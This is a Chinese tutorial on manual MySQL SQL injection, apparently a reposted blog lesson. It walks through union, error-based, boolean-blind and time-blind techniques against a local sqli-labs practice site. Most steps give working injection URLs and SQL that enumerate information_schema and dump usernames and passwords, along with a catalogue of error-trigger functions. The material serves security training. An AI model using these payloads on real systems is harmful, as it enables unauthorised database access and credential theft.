网络安全进阶学习第十课——MySQL手工注入

news2025/1/17 23:00:51

文章目录

  • 一、MYSQL数据库常用函数
  • 二、MYSQL默认的4个系统数据库以及重点库和表
  • 三、判断数据库类型
  • 四、联合查询注入
    • 1、具体步骤(靶场演示):
      • 1)首先判断注入点
      • 2)判断是数字型还是字符型
      • 3)要判断注入点的列数
      • 4)获取数据库在网页中的显示位
      • 5)构造POC查询用户名和数据库名
      • 6)查库的所有表名
      • 7)查出特定表的所有字段名
      • 8)查询users这个表的所有数据
      • 9)使用另一种方式查看数据
  • 五、报错注入
    • 1、MYSQL常用使用的报错函数:
      • 1)floor( )
      • 2)extractvalue( )
      • 3)updatexml( )
      • 4)geometrycollection( )
      • 5)multipoint( )
      • 6)polygon( )
      • 7)multipolygon( )
      • 8)linestring( )
      • 9)multilinestring()
      • 10)exp( )
      • 11)gtid_subset( )
    • 2、报错注入步骤(靶场演示)
      • 1)确定数据库出错会在页面上显示
      • 2)寻找注入点(参考联合注入)
      • 3)判断是数字型还是字符型(参考联合注入)
      • 4)使用报错函数,构造轮子
      • 5)获取数据库名和用户名
      • 6)获取所有的表名
      • 7)获取特定表的字段名(参考联合注入)
      • 8)获取特定表的数据(参考联合注入)
    • 3、报错注入有字符串长度限制
  • 六、盲注
    • 1、布尔类型盲注
    • 2、布尔盲注注入步骤:
      • 1)找到注入点(参考联合注入)
      • 2)构造轮子
      • 3)获取当前用户名和数据库名长度
      • 4)获取当前用户名和数据库名
      • 5)获取当前数据库所有的表名的长度
      • 6)获取当前数据库所有的表名的名字
      • 7)获取users表的所有字段名总长度
      • 8)获取users表的所有字段名名字
      • 9)获取users表的所有数据每一行的总长度
      • 10)获取users表的目的数据
    • 3、时间盲注
    • 4、时间盲注注入步骤:
      • 1)寻找注入点(参考联合注入)
      • 2)判断是数字型还是字符型(参考联合注入)
      • 3)测试sleep函数有没有被过滤,是否会被执行
      • 4)获取当前用户名和数据库长度
      • 5)获取当前用户名和数据库名
      • 6)获取当前数据库所有的表名的总字符串长度(参考布尔盲注)
      • 7)获取当前数据库所有的表名(参考布尔盲注)
      • 8)获取users表的所有字段名的总字符串长度(参考布尔盲注)
      • 9)获取users表的所有字段名(参考布尔盲注)
      • 10)获取users表的目的数据(参考布尔盲注)


一、MYSQL数据库常用函数

在这里插入图片描述


二、MYSQL默认的4个系统数据库以及重点库和表

重点库:information_schema
在这里插入图片描述

在这里插入图片描述


三、判断数据库类型

PHP的网站,常用数据库为MYSQL、PostgreSQL
判断数据库类型:

  • MYSQL:3306
  • PostgreSQL:5432
  • MSSQL:1433

四、联合查询注入

使用场景:数据库在页面中存在显示位。

UNION操作符用于连接两个以上的SELECT语句的结果组合到一个结果集合中。前提是两个select必有相同列

1、具体步骤(靶场演示):

1)首先判断注入点

如下:
在这里插入图片描述
在这里插入图片描述
这里就可以确定注入点是在id这个位置

2)判断是数字型还是字符型

使用1/1和1/0方式来进行测试
在这里插入图片描述
在这里插入图片描述
1/1和1/0都不报错,也就是说没有反应,说明不是数字型

直接添加1个单引号和2个单引号测试
在这里插入图片描述
在这里插入图片描述
1个单引号发生报错,2个单引号不报错,说明这是字符型

3)要判断注入点的列数

使用order by;order by 是用来排序的。假如order by 3不报错,order by
4发生报错,这就说明该表只有3列。
如下:
在这里插入图片描述
在这里插入图片描述
使用的POC:
http://localhost/Less-1/?id=1' order by 4--+

对应的SQL语句:

select * from 表名(未知) where order by 4;
#让他报错

4)获取数据库在网页中的显示位

知道列数后,就需要获取数据库在网页中的显示位(就是显示在网页上的字段),可以使用union来拼接错误查询和自我构造的select语句。

如下:
在这里插入图片描述
http://localhost/Less-1/?id=1

对应的SQL语句:

select * from 表名(未知) where id=1;

此处页面上显示:

Your Login name: Dumb
Your Password: Dumb

在这里插入图片描述
http://localhost/Less-1/?id=2

对应的SQL语句:

select * from 表名(未知) where id=2;

页面上显示:

Your Login name: Angelina
Your Password: I-kill-you

构造错误的select查询字段,例如把id=1改成id=-1
在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=-1' union select 1,2,3 --+

对应的SQL语句:

select * from 表名(未知) where id=-1 union select 1,2,3;

页面上显示:

Your Login name: 2
Your Password: 3

这样子就知道显示位是数据表的第2列和第3列了。

5)构造POC查询用户名和数据库名

在显示位上构造要查询的函数,例如当前用户名和数据库名
在这里插入图片描述
构造POC:
http://localhost/ Less-1/?id=-1' union select 1,user(),database()--+

对应的SQL语句:

select * from 表名(未知) where id=-1 union select 1,user(),database();

页面上显示:

Your Login name: root@localhost
Your Password: security

这样我就知道当前数据库的用户名和数据库名了。

6)查库的所有表名

在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=-1' union select 1,2, table_name from information_schema.tables where table_schema='security'--+

对应的SQL语句:

select * from 表名(未知) where id=-1 union select 1,2,table_name from information_schema.tables where table_schema='security';

上面就只会输出第一个表名字email,而不会输出全部的表名

输出所有的表名,使用group_concat()函数来拼接输出
在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema='security'--+

对应的SQL语句:

select * from 表名(未知) where id=-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema='security';

这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users

7)查出特定表的所有字段名

在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=-1' union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security'--+

对应的SQL语句:

select * from 表名(未知) where id=-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security';

现在这里就输出了security这个数据库里面所有表的所有字段名称

现在又有另一个问题了,就是我只想知道敏感数据表的字段名,例如users这个表里面的字段名,这时候就要:
在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=-1' union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

对应的SQL语句:

select * from 表名(未知) where id=-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users';

现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password

8)查询users这个表的所有数据

在这里插入图片描述
使用的POC:
http:// localhost/ Less-1/?id=-1’ union select 1,group_concat(username), group_concat(password) from users--+

对应的SQL语句:

select * from users where id=-1 union select 1,group_concat(username), group_concat(password) from users;

这样就把所有的学生名和密码都查出了,同时也知道了显示位显示的表就是users表

美化一下:
在这里插入图片描述
使用的POC:
http:// localhost/ Less-1/?id=-1’ union select 1,2, group_concat(username,'^',password) from users--+

对应的SQL语句:

select * from users where id=-1 union select 1,2, group_concat(username,'^',password) from users;

9)使用另一种方式查看数据

也可以不使用group_concat()函数,使用concat()+limit的方式来查看表的数据。
在这里插入图片描述
使用的POC:
http:// localhost/ Less-1/?id=-1’ union select 1,2,group_concat(username,'^',password) from users limit 0,1--+

对应的SQL语句:

select * from users where id=-1 union select 1,2,group_concat(username,'^',password) from users limit 0,1;

这样子就可以一条一条来看。


五、报错注入

使用场景:数据库错误提示会在页面上显示。

1、MYSQL常用使用的报错函数:

1)floor( )

常用注入语法格式:

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2)) x from information_schema.tables group by x) a);

2)extractvalue( )

extractvalue(xml_frag, xpath_expr)
从一个使用xpath语法的xml字符串中提取一个值。

xml_frag:xml文档对象的名称,是一个string类型。
xpath_expr:使用xpath语法格式的路径。

若xpath_expr参数不符合xpath格式,就会报错。而~ 符号(ascii编码值:0x7e)是不存在xpath格式中的, 所以一旦在xpath_expr参数中使用~符号,就会报错。

常用注入语法格式:

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e),1));

3)updatexml( )

常用注入语法格式:

select * form test where id=1 and (updatexml(1,concat(0x7e,(select user())),1));

4)geometrycollection( )

常用注入语法格式:

select * from test where id=1 and geometrycollection((select * from(select user())a)b));

5)multipoint( )

常用注入语法格式:

select * from test where id=1 and multipoint((select * from(select user())a)b));

6)polygon( )

常用注入语法格式:

select * from test where id=1 and polygon((select * from(select user())a)b));

7)multipolygon( )

常用注入语法格式:

select * from test where id=1 and multipolygon((select * from(select user())a)b));

8)linestring( )

常用注入语法格式:

select * from test where id=1 and linestring((select * from(select user())a)b));

9)multilinestring()

常用注入语法格式:

select * from test where id=1 and multilinestring((select * from(select user())a)b));

10)exp( )

常用注入语法格式:

select * from test where id=1 and exp(~(select * from(select user())a));

11)gtid_subset( )

常用注入语法格式:

select gtid_subset(user(),1);

2、报错注入步骤(靶场演示)

1)确定数据库出错会在页面上显示

在这里插入图片描述

2)寻找注入点(参考联合注入)

3)判断是数字型还是字符型(参考联合注入)

4)使用报错函数,构造轮子

在这里插入图片描述
这里就使用updatexml()函数,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。

使用的POC:
http://localhost/ Less-1/?id=1' and updatexml(1,0x7e,1)--+

对应的SQL语句:

select * from users where id=1 and updatexml(1,0x7e,1);

5)获取数据库名和用户名

在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1)--+

对应的SQL语句:

select * from users where id=1 and updatexml(1,concat(0x7e,database()),1);

6)获取所有的表名

在这里插入图片描述
使用的POC:
http://localhost/ Less-1/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)–+

对应的SQL语句:

select * from users where id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1);

7)获取特定表的字段名(参考联合注入)

8)获取特定表的数据(参考联合注入)

3、报错注入有字符串长度限制

报错注入常用的函数通常会有字符串长度限制,其最长输出32位。如果直接使用group_concat()函数会输出不全。

举例:
在这里插入图片描述
使用的POC:
http://localhost/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select group_concat(username,'^',password) from users)),1) --+

这样子只能输出32个字符串长度的内容,无法输出全;

这时候就要使用limit来进行操作,来进行一个一个的输出:
在这里插入图片描述
使用的POC:
http://localhost/Less-1/?id=1’ and updatexml(1,concat(0x7e,(select concat(username,‘^’,password) from users limit 0,1)),1) --+


六、盲注

1、布尔类型盲注

使用场景:页面没有显示位,数据库查询出错也不会在页面上显示,只会有查询正确和查询错误两种页面提示,例如下面这种情况:

正常,为true
在这里插入图片描述
在这里插入图片描述

添加1个单引号,为false
在这里插入图片描述
在这里插入图片描述

添加2个单引号,为true
在这里插入图片描述
在这里插入图片描述

2、布尔盲注注入步骤:

1)找到注入点(参考联合注入)

2)构造轮子

在这里插入图片描述
使用的POC:
http://localhost/Less-8/?id=1' and 1=if(1=1,1,0)--+

在这里插入图片描述
使用的POC:
http://localhost/Less-8/?id=1' and 1=if(1=2,1,0)--+

3)获取当前用户名和数据库名长度

在这里插入图片描述
使用的POC:
http://localhost/Less-8/?id=1' and 1= if(length(user())=8,1,0)--+

接着可以使用BP爆破长度
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这样子就猜出用户名字符串长度是14。使用同样方法可以得出当前数据库名的长度是8。

4)获取当前用户名和数据库名

方法一:
在这里插入图片描述
http://localhost/Less-8/?id=1' and 1=if(mid(user(),1,1)='q',1,0)--+

同样可以使用BP爆破
在这里插入图片描述
爆破两个payload

在这里插入图片描述
第一个爆破位置,只使用数字

在这里插入图片描述
第二个爆破字符,就把英文字母+数字+特殊符号添加进去,注意服务器是否有大小写区分。

在这里插入图片描述
这样就爆破出来了,就得出当前用户名是:root@localhost。同样方法可以获取到当前数据库名是:security

方法二:
当截取函数是被禁用,无法使用,那么就使用like+‘_’
举例上面我已经知道当前用户名的字符串长度是14,需要获取到用户名的名字
在这里插入图片描述
使用的POC:
http://localhost/Less-8/?id=1' and 1= if(user()+like+'______________',1,0)--+

这里的返回值是ture。因为正则里面下划线”_”是可以代表任意字符的。

在这里插入图片描述
这样子,我们就可以使用BP逐位逐位地进行爆破,从而获取到对应的用户名名字。

5)获取当前数据库所有的表名的长度

在这里插入图片描述
构造POC:
http://localhost/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=10--+

使用BP爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里就获得长度是29位。

6)获取当前数据库所有的表名的名字

在这里插入图片描述
构造POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a'--+

使用BP进行爆破
在这里插入图片描述
在这里插入图片描述
上述第一个payload知道是29位,字典就选到29

在这里插入图片描述
第二个payload的字典就把英文字母+数字+特殊符号添加进去,注意服务器是否有大小写区分。

在这里插入图片描述
好了这样就知道所有的表名字是:emails,referers,uagents,users

7)获取users表的所有字段名总长度

在这里插入图片描述
构造POC:
http://localhost/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=10--+

同样BP爆破
在这里插入图片描述
这样子就知道了users表的字段名总字符串长度是20

8)获取users表的所有字段名名字

在这里插入图片描述
构造POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='a' --+

同样使用BP爆破
在这里插入图片描述
这里就获得users表的字段名称是:id,username,password

9)获取users表的所有数据每一行的总长度

在这里插入图片描述
构造POC:
http://localhost/Less-8/?id=1' and length((select concat(username,'^',password) from users limit 0,1))=10--+

开始使用BP爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这样子就知道该表一共有13行,并且每行concat拼接后对应的字符串长度。

10)获取users表的目的数据

由于上面已经知道该表的字段名、数据行数、每行拼接后的总字符串长度,那么就可以逐行地进行爆破。
在这里插入图片描述
使用的POC:
http://localhost/Less-8/?id=1' and mid((select concat(username,'^',password) from users limit 0,1),1,1)='a' --+
具体BP爆破就不多说了,操作差不多。

3、时间盲注

页面返回值只有一种:true。无论输入任何值,返回情况都会按正常的来处理。加入特定的时间函数(sleep),通过查看web页面返回的时间差来判断注入的语句是否正确。
例如下面这种情况:
在这里插入图片描述

4、时间盲注注入步骤:

1)寻找注入点(参考联合注入)

2)判断是数字型还是字符型(参考联合注入)

3)测试sleep函数有没有被过滤,是否会被执行

在这里插入图片描述
sleep(1)相应时间时13158毫秒

在这里插入图片描述
sleep(0)相应时间时16毫秒

这里就说明sleep()函数会被执行

4)获取当前用户名和数据库长度

在这里插入图片描述
使用的POC:
http://localhost/Less-48/?sort=1 and if(length(user())=10,sleep(1),1)--+
这里就是假如猜测的长度争取,就会执行sleep(1)。

使用BP爆破
在这里插入图片描述
在这里插入图片描述

下面需要勾选响应时间
在这里插入图片描述
在这里插入图片描述
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。同理爆破数据库名长度是8。

5)获取当前用户名和数据库名

在这里插入图片描述
http://localhost/Less-48/?sort=1 and if(mid(user(),1,1)='a',sleep(1),1)--+

接着使用BP爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
第二个爆破payload字典,注意把英文字母+数字+特殊符号添加进去,注意服务器是否有大小写区分。

在这里插入图片描述
在这里插入图片描述
这里就能看出来爆破出来的用户名按照顺序排列是:root@localhost;同理使用同样的方法爆破获得数据库名是:security。

6)获取当前数据库所有的表名的总字符串长度(参考布尔盲注)

7)获取当前数据库所有的表名(参考布尔盲注)

8)获取users表的所有字段名的总字符串长度(参考布尔盲注)

9)获取users表的所有字段名(参考布尔盲注)

10)获取users表的目的数据(参考布尔盲注)


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/829485.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

O3DE的Pass

Pass介绍 Pass是具有输入和输出的渲染过程。 在最终渲染帧中看到的每个细节都是通过一系列Pass(前一个Pass的输出是下一个Pass的输入)计算出来的。Pass可以生成图像(作为纹理、缓冲区或渲染目标)。每个图像都包含关于场景的特定…

【话题】感觉和身边其他人有差距怎么办?也许自我调整很重要

每个人能力有限,水平高低不同,我们身在大环境里,虽然在同一个起跑线上,但是时间久了,你会发现,并越来越感觉到和身边其他人有了差距,慢慢的会有一定的落差感,怎么办呢!通…

Android手机信息获取(详细版)

经典好文推荐,通过阅读本文,您将收获以下知识点: 一、 获取手机基本信息(厂商、型号等参数) 二、设备信息获取实现图 三、 获取手机设备 宽、高、IMEI 信息 四、 获取手机厂商名、产品名、手机品牌、手机型号、主板名、设备名 五、获取手机硬件名、SDK版本、android版本 、语…

无代码开发:打破传统开发模式,引领数字化转型新方向

随着数字化转型的加速,企业对于高效、便捷的软件开发需求愈发旺盛。无代码开发作为一种新兴的软件开发模式,以其可视化、模块化的开发方式,为数字化转型提供了新的方向。本文将从无代码开发的优势、应用场景、如何实现等方面进行详细解读&…

中介者模式——协调多个对象之间的交互

1、简介 1.1、概述 如果在一个系统中对象之间的联系呈现为网状结构,如下图所示: 对象之间存在大量的多对多联系,将导致系统非常复杂,这些对象既会影响别的对象,也会被别的对象所影响,这些对象称为同事对…

配置root账户ssh免密登录并使用docker-machine构建docker服务

简介 Docker Machine是一种可以在多种平台上快速安装和维护docker运行环境,并支持多种平台,让用户可以在很短时间内在本地或云环境中搭建一套docker主机集群的工具。 使用docker-machine命令,可以启动、审查、停止、重启托管的docker 也可以…

揭示用户激活的价值:为什么产品经理应该关注

如果你在一家SaaS公司工作,你可能自诩对漏斗指标有很好的理解,你可能可以倒背如流——获取,用户激活,保留,推荐和收入。你甚至可能记得它们的出处,但是你对这些指标的理解到底有多深呢?你知道你…

node.js系列-多种方案教你在node程序中同时使用CommonJS 和 ES Module 混合开发最佳实践

前情提要 我们平时使用的npm 第三方包一般基于这两种规范开发的,很容易遇到一个项目里既有 CommonJS 又有 ES Module 的情况,那么我们应该如何解决这种CommonJS 和 ES Module 混合开发的问题呢? CommonJS是什么? 2009年&#x…

C++学习笔记总结练习--容器

容器 1 简介 新标准库的容器壁使用原始的数组实现的数据结构要快很多。经过了精心的优化。 确定使用哪种容器 除非有明确的理由,否则使用vector随机元素访问vector或deque容器中间插入或者插入元素list、forward_list头尾插入元素,使用deque可以在输入…

RelativeSource有四种类型

Self FindAncestor TemplatedParent PreviousData a.Self Self用于绑定源和绑定目标相同的场景中。对象的一个属性与同一对象的另一个属性绑定。 例如&#xff0c;让我们取一个高度和宽度相同的椭圆。在XAML文件中添加下面给出的代码。宽度属性与高度属性相对绑定。 <G…

Stephen Wolfram:“足够大的网络肯定能做任何事!”

“Surely a Network That’s Big Enough Can Do Anything!” “足够大的网络肯定能做任何事&#xff01;” The capabilities of something like ChatGPT seem so impressive that one might imagine that if one could just “keep going” and train larger and larger neura…

【Kubernetes】Kubernetes的部署

kubernetes 一、Kubernetes 的安装部署1. 常见的安装部署方式1.1 Minikube1.2 Kubeadm1.3 二进制安装部署 2. K8S 部署 二进制与高可用的区别2.1 二进制部署2.2 kubeadm 部署 二、Kubernetes 的部署过程1. 二进制部署1.1 服务器相关设置以及架构1.2 操作系统初始化配置1.3 部署…

【前端|Javascript第1篇】一文搞懂Javascript的基本语法

欢迎来到JavaScript的奇妙世界&#xff01;作为前端开发的基石&#xff0c;JavaScript为网页增色不少&#xff0c;赋予了静态页面活力与交互性。如果你是一名前端小白&#xff0c;对编程一无所知&#xff0c;或者只是听说过JavaScript却从未涉足过&#xff0c;那么你来对了地方…

《探索文心千帆大模型平台: 代码编写从此变得轻松》

文章目录 前言一、初识文心千帆1.1 功能丰富1.2 注册登录 二、内置第三方大模型2.1 ERNIE-Bot模型2.2 ERNIE-Bot-turbo模型2.3 BLOOMZ-7B模型2.4 Llama模型全家桶2.5 在线体验2.5.1 代码编写能力简单提问复杂提问报错解决添加注释 2.5.2 逻辑判断先有鸡还是先有蛋&#xff1f;鸡…

CTF-MISC:BUUCTF练习汇总(26-31题)

CTF-MISC&#xff1a;BUUCTF练习汇总 26、后门查杀27、webshell后门28、来首歌吧29、荷兰宽带数据泄露30、面具下的flag31、九连环 26、后门查杀 解题思路&#xff1a;题干可知webshell的密码为flag&#xff0c;且下载的文件为网站源码&#xff0c;人工查找不太现实&#xff0…

【框架篇】Spring MVC 介绍及使用(详细教程)

Spring MVC 介绍 1&#xff0c;MVC 设计模式 MVC&#xff08;Model-View-Controller&#xff09;是一种常见的软件设计模式&#xff0c;用于将应用程序的逻辑分离成三个独立的组件&#xff1a; 模型&#xff08;Model&#xff09;&#xff1a;模型是应用程序的数据和业务逻辑…

微信小程序iconfont真机渲染失败

解决方法&#xff1a; 1.将下载的.woff文件在transfonter转为base64&#xff0c; 2.打开网站&#xff0c;导入文件&#xff0c;开启base64按钮&#xff0c;下载转换后的文件 3. 在下载解压后的文件夹中找到stylesheet.css&#xff0c;并复制其中的base64 4. 修改index.wxss文…

proj库配置与使用(window11,vs2019,x64)

前置安装依赖 1.SQLite3 安装 亲测 (97条消息) SQLite3源码下载与编译&#xff08;开发环境&#xff1a;Win10VS2022&#xff09;_sqlite3 下载_林夕07的博客-CSDN博客 2.TIFF 亲测 (97条消息) Win11下基于cmake-3.26.3 完美编译 TIFF-4.5.0源码_tiff 编译_GIS子枫的博客-C…

免费的ssl证书

免费的SSL证书对于保证网站的安全性和信任度来说是非常重要的。虽然有些人可能会认为&#xff0c;免费的SSL证书可能不如付费的证书有效&#xff0c;但事实并非如此。 首先&#xff0c;免费的SSL证书同样能够为网站提供加密与解密的功能。这意味着所有的数据将会在传输过程中被…